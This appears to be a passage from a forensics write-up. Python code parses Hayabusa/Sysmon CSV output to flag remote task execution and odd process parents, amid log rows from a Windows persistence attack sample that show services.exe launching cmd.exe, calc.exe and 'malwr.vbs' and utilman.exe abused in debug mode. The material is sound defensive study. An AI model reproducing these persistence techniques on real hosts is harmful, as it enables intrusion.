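2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",rule.yml,sample.evtx
2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,rule.yml,sample.evtx
2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,rule.yml,sample.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rule.yml,sample.evtx
'''


def parse_details(details: str) -> dict:
    """Split Hayabusa's 'Key: value | Key: value' Details column into a dict."""
    out = {}
    for part in details.split(" | "):
        key, _, val = part.partition(":")
        if key.strip():
            out[key.strip()] = val.strip()
    return out


def load_rows(text: str) -> list:
    """Parse the CSV, adding a tz-aware timestamp ('ts') and parsed Details ('d')."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        r["ts"] = datetime.strptime(r["Timestamp"], "%Y-%m-%d %H:%M:%S.%f %z")
        r["d"] = parse_details(r["Details"])
        rows.append(r)
    return rows


def correlate_remote_exec(rows: list, window: timedelta = timedelta(seconds=30)) -> list:
    """Group 5140/5145 share access under the 4624 type-3 logon with the same LID;
    attach 4698/4699 events within `window` of the logon (task events carry no
    LID, so the window is the heuristic) and note an ANONYMOUS LOGON from the
    same IP just before it (the null session that precedes SMB authentication)."""
    sessions = {}
    for r in rows:
        d = r["d"]
        if r["EventID"] == "4624" and r["RuleTitle"].startswith("Logon Type 3") and d.get("LID"):
            sessions[d["LID"]] = {"lid": d["LID"], "user": d.get("User"), "ip": d.get("IP Addr"),
                                  "first_seen": r["ts"], "shares": set(), "files": [],
                                  "task_events": [], "anonymous_precursor": False}
    for r in rows:
        s = sessions.get(r["d"].get("LID"))
        if s and r["EventID"] in ("5140", "5145"):
            s["shares"].add(r["d"].get("Share Name", ""))
            if r["d"].get("Path"):
                s["files"].append(r["d"]["Path"])
    tasks = [r for r in rows if r["EventID"] in ("4698", "4699")]
    anon = [r for r in rows if r["EventID"] == "4624" and r["d"].get("User") == "ANONYMOUS LOGON"]
    findings = []
    for s in sessions.values():
        if not any(name.endswith("IPC$") for name in s["shares"]):
            continue  # the task-scheduler RPC interface is reached over the IPC$ pipe
        s["task_events"] = [(t["EventID"], t["ts"]) for t in tasks
                            if abs(t["ts"] - s["first_seen"]) <= window]
        s["anonymous_precursor"] = any(a["d"].get("IP Addr") == s["ip"]
                                       and timedelta(0) <= s["first_seen"] - a["ts"] <= window
                                       for a in anon)
        if s["task_events"]:
            findings.append(s)
    return findings


def exe_name(cmdline: str) -> str:
    """Lower-cased image basename from a Sysmon command line or full path."""
    cmdline = cmdline.strip()
    image = cmdline[1:].split('"', 1)[0] if cmdline.startswith('"') else cmdline.split(" ", 1)[0]
    return ntpath.basename(image).lower()


# Heuristic allowlists (assumptions): images services.exe is expected to start,
# and the accessibility binaries winlogon/utilman legitimately launch.
SERVICE_IMAGES = {"svchost.exe", "spoolsv.exe", "taskhost.exe", "lsass.exe", "lsm.exe"}
ACCESSIBILITY = {"utilman.exe", "osk.exe", "sethc.exe", "narrator.exe", "magnify.exe",
                 "displayswitch.exe", "atbroker.exe"}


def process_anomalies(rows: list) -> list:
    """(reason, child image, user, PID) for Sysmon event 1 rows where services.exe
    starts a non-service image, or an accessibility tool spawns a non-accessibility child."""
    findings = []
    for r in rows:
        if r["EventID"] != "1" or r["RuleTitle"] != "Process Created":
            continue
        d = r["d"]
        child, parent = exe_name(d.get("Process", "")), exe_name(d.get("Parent Cmd", ""))
        if parent == "services.exe" and child not in SERVICE_IMAGES:
            findings.append(("services.exe started a non-service image", child, d.get("User"), d.get("PID")))
        elif parent in ACCESSIBILITY and child not in ACCESSIBILITY:
            findings.append(("accessibility tool spawned an unexpected child", child, d.get("User"), d.get("PID")))
    return findings


if __name__ == "__main__":
    rows = load_rows(SAMPLE_CSV)
    for f in correlate_remote_exec(rows):
        print(f"{f['ip']} as {f['user']} (LID {f['lid']}): shares={sorted(f['shares'])} "
              f"files={f['files']} tasks={[e for e, _ in f['task_events']]} "
              f"anonymous_precursor={f['anonymous_precursor']}")
    for why, child, user, pid in process_anomalies(rows):
        print(f"{why}: {child} pid={pid} user={user}")
```

Run against the excerpt, the first check reports one session (LID 0x17e2c0 from 10.0.2.17 as Administrator, IPC$ and ADMIN$ touched, Temp\CYAlyNSS.tmp read, one 4699 inside the window, ANONYMOUS LOGON 47 ms earlier) and ignores the machine-account logon from the link-local address; the second flags cmd.exe and calc.exe under services.exe but not svchost.exe, and treats utilman.exe spawning osk.exe as expected. Against the full CSV the same code would also group the 4672 rows by LID if you add 4672 to the share loop, and the window would need tuning on a busy host.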
2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
